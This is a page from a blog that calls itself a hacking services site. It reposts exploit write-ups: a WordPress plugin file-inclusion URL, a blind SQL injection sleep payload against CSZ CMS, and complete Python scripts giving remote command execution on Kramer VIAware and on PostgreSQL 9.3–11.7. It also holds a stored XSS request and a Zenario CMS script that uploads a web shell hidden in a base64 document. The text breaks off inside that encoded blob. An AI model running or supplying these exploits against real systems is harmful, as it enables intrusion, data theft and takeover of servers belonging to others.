Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130975

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 26-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/
# Version: 1.7.4
# Tested on: Firefox

# Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php

# Vulnerable Code:

```
<?php
if ($_GET['p']<=NULL) {
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php');
}else{
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php');
}
```

# Proof of Concept:

http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=
<http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>[LFI]

Contents of index.php: <?php echo "Local file read"; phpinfo(); ?>
HireHackking 
# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
# Date: 2021-04-14
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip
# Version: 1.2.9
# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46
# CVE: CVE-2021-43701

*Steps to Reproduce:*
1. First login to your Admin Panel
2. then go to "General Menu > CSV Export / Import".
3. open burp site and configure with browser.
4. then select any "Table Name" > Select "Fields Select" and Select "Sort by"
5. Now click "Export to CSV" and intercept with burp suite
6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in "orderby" parameter.

*Proof of Concept:*
http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV

*Output:*
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 1 seconds.
By issuing sleep(5) response will be delayed to 5 seconds.
By issuing sleep(10) response will be delayed to 10 seconds
HireHackking 
# Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)
# Date: 28/03/2022
# Exploit Author: sharkmoos & BallO
# Vendor Homepage: https://www.kramerav.com/
# Software Link: https://www.kramerav.com/us/product/viaware
# Version: 2.5.0719.1034
# Tested on: ViaWare Go (Windows 10)
# CVE : CVE-2019-17124

import requests, sys, urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def adminLogin(s, host, username, password):
    headers = {
        "Host": f"{host}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-GB,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": f"https://{host}",
        "Referer": f"https://{host}/admin/login.php",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Sec-Gpc": "1",
        "Te": "trailers",
        "Connection": "close"
        }
    data = {
        "txtUserId": username,
        "txtPwd": password,
        "btnOk" :"Login"
        }
    response = s.post(f"https://{host}/admin/login.php", verify=False)
    if len(s.cookies) < 1:
        return False
    else:
        return True


def writeCommand(session, host, command):
    headers = {
    "Host": f"{host}",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
    "Accept": "text/html, */*",
    "Accept-Language": "en-GB,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": f"https://{host}",
    "Referer": f"https://{host}/browseSystemFiles.php?path=C:\Windows&icon=browser",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Gpc": "1",
    "Te": "trailers",
    "Connection": "close"
    }
    data = {
        "radioBtnVal":f"{command}",
        "associateFileName": "C:/tc/httpd/cgi-bin/exploit.cmd"
        }
    session.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data)


def getResult(session, host):
    file = session.get(f"https://{host}/cgi-bin/exploit.cmd", verify=False)
    pageText = file.text
    if len(pageText) < 1:
        result = "Command did not return a result"
    else:
        result = pageText
    return result

        

def main(host, username="su", password="supass"):
    s = requests.Session()
    # comment this line to skip the login stage    
    loggedIn = adminLogin(s, host, username, password)
    
    if not loggedIn:
        print("Could not successfully login as the admin")
        sys.exit(1)
    else:
        pass

    command = ""
    while command != "exit":
        command = input("cmd:> ").strip()
        writeCommand(s, host, command)
        print(getResult(s, host))
    exit()

if __name__ == "__main__":
    
    args = sys.argv
    numArgs = len(args)
    if  numArgs < 2:
        print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")
        print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")
    if numArgs == 2:
        main(args[1])
    if numArgs == 4:
        main(args[1], args[2], args[3])
    if numArgs > 4:
        print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")
        print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")
HireHackking 
# Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-03-29
# Exploit Author: b4keSn4ke
# Github: https://github.com/b4keSn4ke
# Vendor Homepage: https://www.postgresql.org/
# Software Link: https://www.postgresql.org/download/linux/debian/
# Version: 9.3 - 11.7
# Tested on: Linux x86-64 - Debian 4.19
# CVE: CVE-2019–9193

#!/usr/bin/python3 

import psycopg2
import argparse
import hashlib
import time

def parseArgs():
    parser = argparse.ArgumentParser(description='CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution')
    parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')
    parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]')
    parser.add_argument('-d', '--database', nargs='?', default='template1', help='Name of the PostgreSQL DB [Default: template1]')
    parser.add_argument('-c', '--command', nargs='?', help='System command to run')
    parser.add_argument('-t', '--timeout', nargs='?', type=int, default=10, help='Connection timeout in seconds [Default: 10 (seconds)]')
    parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]')
    parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]')
    args = parser.parse_args()
    return args

def main():
    try:
        print ("\r\n[+] Connecting to PostgreSQL Database on {0}:{1}".format(args.ip, args.port))
        connection = psycopg2.connect (
            database=args.database, 
            user=args.user, 
            password=args.password, 
            host=args.ip, 
            port=args.port, 
            connect_timeout=args.timeout
        )
        print ("[+] Connection to Database established")
        
        print ("[+] Checking PostgreSQL version")
        checkVersion(connection)

        if(args.command):
            exploit(connection)
        else:
            print ("[+] Add the argument -c [COMMAND] to execute a system command")

    except psycopg2.OperationalError as e:
        print ("\r\n[-] Connection to Database failed: \r\n{0}".format(e))
        exit()

def checkVersion(connection):
    cursor = connection.cursor()
    cursor.execute("SELECT version()")
    record = cursor.fetchall()
    cursor.close()

    result = deserialize(record)
    version = float(result[(result.find("PostgreSQL")+11):(result.find("PostgreSQL")+11)+4])

    if (version >= 9.3 and version <= 11.7):
        print("[+] PostgreSQL {0} is likely vulnerable".format(version))

    else:
        print("[-] PostgreSQL {0} is not vulnerable".format(version))
        exit()

def deserialize(record):
    result = ""
    for rec in record:
        result += rec[0]+"\r\n"
    return result

def randomizeTableName():
    return ("_" + hashlib.md5(time.ctime().encode('utf-8')).hexdigest())

def exploit(connection):
    cursor = connection.cursor()
    tableName = randomizeTableName()
    try:
        print ("[+] Creating table {0}".format(tableName))
        cursor.execute("DROP TABLE IF EXISTS {1};\
                        CREATE TABLE {1}(cmd_output text);\
                        COPY {1} FROM PROGRAM '{0}';\
                        SELECT * FROM {1};".format(args.command,tableName))

        print ("[+] Command executed\r\n")
        
        record = cursor.fetchall()
        result = deserialize(record)

        print(result)
        print ("[+] Deleting table {0}\r\n".format(tableName))

        cursor.execute("DROP TABLE {0};".format(tableName))
        cursor.close()

    except psycopg2.errors.ExternalRoutineException as e:
        print ("[-] Command failed : {0}".format(e.pgerror))
        print ("[+] Deleting table {0}\r\n".format(tableName))
        cursor = connection.cursor()
        cursor.execute("DROP TABLE {0};".format(tableName))
        cursor.close()

    finally:
        exit()

if __name__ == "__main__":
    args = parseArgs()
    main()
HireHackking
# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS # Date: 2/27/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/easy-cookies-policy/ # Version: 1.6.2 # Tested on: Windows 10 # CVE: CVE-2021-24405 1. Description: Broken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php. If users can't register, this can be done through CSRF. 2. Proof of Concept: POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 226 Origin: http://localhost Connection: keep-alive Host: localhost Cookie: [Any authenticated user] action=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd
HireHackking
# Exploit Title: Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated) # Date: 04/02/2022 # Exploit Author: minhnq22 # Vendor Homepage: https://zenar.io/ # Software Link: https://zenar.io/download-page # Version: 9.0.54156 # Tested on: Ubuntu 21.04 # CVE : CVE-2021–42171 # Python3 import os import sys import json import uuid import base64 import requests # Input if len(sys.argv) != 4: print("Usage: " + sys.argv[0] + " 'http(s)://TARGET/zenario' 'USERNAME' 'PASSWORD'") exit(1) TARGET = sys.argv[1] USERNAME = sys.argv[2] PASSWORD = sys.argv[3] ## Attempt to log in ### Get cookie resp = requests.get(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D") ### Grab the PHP session ID PHPSESSID = resp.headers['Set-Cookie'].split(";")[0] ### Authen with cookie resp = requests.post(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D", headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID}, data={"_validate": "true", "_box": '{"tab":"login","tabs":{"login":{"edit_mode":{"on":1},"fields":{"reset":{"_was_hidden_before":true},"description":{},"username":{"current_value":"' + USERNAME + '"},"password":{"current_value":"' + PASSWORD + '"},"admin_login_captcha":{"_was_hidden_before":true,"current_value":""},"remember_me":{"current_value":false},"login":{"pressed":true},"forgot":{"pressed":false},"previous":{"pressed":false}}},"forgot":{"edit_mode":{"on":1},"fields":{"description":{},"email":{"current_value":""},"previous":{},"reset":{}}}},"path":"login"}'}) # If login OK print("Login OK!") ## Upload web shell ### Get sync info resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload", headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_fill": "true", "_values": ""}) resp_body = json.loads(resp.text) password_sync = resp_body["_sync"]["password"] iv_sync = resp_body["_sync"]["iv"] cache_dir_sync = resp_body["_sync"]["cache_dir"] ### Create blank docx file file_content = b"UEsDBBQABgAIAAAAIQDfpNJsWgEAACAFAAATAAgCW0NvbnRlbnRfVHlwZXNdLnhtbCCiBAIooAAC\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC0\nlMtuwjAQRfeV+g+Rt1Vi6KKqKgKLPpYtUukHGHsCVv2Sx7z+vhMCUVUBkQpsIiUz994zVsaD0dqa\nbAkRtXcl6xc9loGTXmk3K9nX5C1/ZBkm4ZQw3kHJNoBsNLy9GUw2ATAjtcOSzVMKT5yjnIMVWPgA\njiqVj1Ykeo0zHoT8FjPg973eA5feJXApT7UHGw5eoBILk7LXNX1uSCIYZNlz01hnlUyEYLQUiep8\n6dSflHyXUJBy24NzHfCOGhg/mFBXjgfsdB90NFEryMYipndhqYuvfFRcebmwpCxO2xzg9FWlJbT6\n2i1ELwGRztyaoq1Yod2e/ygHpo0BvDxF49sdDymR4BoAO+dOhBVMP69G8cu8E6Si3ImYGrg8Rmvd\nCZFoA6F59s/m2NqciqTOcfQBaaPjP8ber2ytzmngADHp039dm0jWZ88H9W2gQB3I5tv7bfgDAAD/\n/wMAUEsDBBQABgAIAAAAIQAekRq37wAAAE4CAAALAAgCX3JlbHMvLnJlbHMgogQCKKAAAgAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArJLBasMw\nDEDvg/2D0b1R2sEYo04vY9DbGNkHCFtJTBPb2GrX/v082NgCXelhR8vS05PQenOcRnXglF3wGpZV\nDYq9Cdb5XsNb+7x4AJWFvKUxeNZw4gyb5vZm/cojSSnKg4tZFYrPGgaR+IiYzcAT5SpE9uWnC2ki\nKc/UYySzo55xVdf3mH4zoJkx1dZqSFt7B6o9Rb6GHbrOGX4KZj+xlzMtkI/C3rJdxFTqk7gyjWop\n9SwabDAvJZyRYqwKGvC80ep6o7+nxYmFLAmhCYkv+3xmXBJa/ueK5hk/Nu8hWbRf4W8bnF1B8wEA\nAP//AwBQSwMEFAAGAAgAAAAhAJdANEq+AgAAvQoAABEAAAB3b3JkL2RvY3VtZW50LnhtbKSW227b\nMAxA3wfsHwK/t7KdxEmNpkW7dkMfBhTr9gGKLNtCrQsk5bavH+X75q5w3BdbIs0jiiJpXd8eeTHb\n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